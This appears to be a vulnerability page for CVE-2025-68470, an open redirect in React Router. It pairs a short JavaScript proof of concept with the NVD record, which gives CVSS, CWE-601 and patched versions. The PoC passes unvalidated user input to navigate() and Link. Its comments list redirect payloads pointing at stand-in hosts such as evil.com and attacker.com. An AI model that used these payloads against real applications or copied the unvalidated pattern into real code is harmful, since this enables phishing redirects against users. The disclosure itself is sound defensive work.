CVE-2025-68470

// CVE-2025-68470 PoC - React Router Open Redirect // Affected versions: React Router 6.0.0 - 6.30.1, 7.0.0 - 7.9.5 import { BrowserRouter, useNavigate } from 'react-router-dom'; import { Routes, Route, Link } from 'react-router-dom'; // Vulnerable component - user input passed directly to navigate() function VulnerableNavigation() { const navigate = useNavigate(); // Attacker can craft URL like: /navigate?path=//evil.com const handleNavigation = (userInput) => { // Vulnerable code - no validation on userInput navigate(userInput); }; return ( <div> {/* Attacker can also use Link component */} <Link to={userProvidedPath}>Click here</Link> </div> ); } // Attack vector examples: // 1. navigate('//evil.com') - redirects to external domain // 2. navigate('///attacker.com/evil-page') - bypasses validation // 3. <Link to="//phishing-site.com">Malicious Link</Link> // 4. redirect('//external-site.com/page') // PoC URL to trigger vulnerability: // https://vulnerable-app.com/?redirect=//evil.com // or // https://vulnerable-app.com/navigate?path=//attacker.com/phishing

{"cve": {"id": "CVE-2025-68470", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:48.477", "lastModified": "2026-01-30T18:20:54.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "React Router is a router for React. In versions 6.0.0 through 6.30.1 and 7.0.0 through 7.9.5, an attacker-supplied path can be crafted so that when a React Router application navigates to it via navigate(), <Link>, or redirect(), the app performs a navigation/redirect to an external URL. This is only an issue if you are passing untrusted content into navigation paths in your application code. This issue has been patched in versions 6.30.2 and 7.9.6."}, {"lang": "es", "value": "React Router es un router para React. En las versiones 6.0.0 a 6.30.1 y 7.0.0 a 7.9.5, una ruta proporcionada por un atacante puede ser diseñada de modo que cuando una aplicación de React Router navega a ella a través de navigate(), , o redirect(), la aplicación realiza una navegación/redirección a una URL externa. Esto es solo un problema si está pasando contenido no confiable a rutas de navegación en el código de su aplicación. Este problema ha sido parcheado en las versiones 6.30.2 y 7.9.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.30.1", "matchCriteriaId": "FFF65931-3D66-4739-BFC7-9632E04CFBD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.9.5", "matchCriteriaId": "7460DDBE-CAD6-4AD1-A8CF-334FBB977ABE"}]}]}], "references": [{"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-9jcx-v3wj-wh4m", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}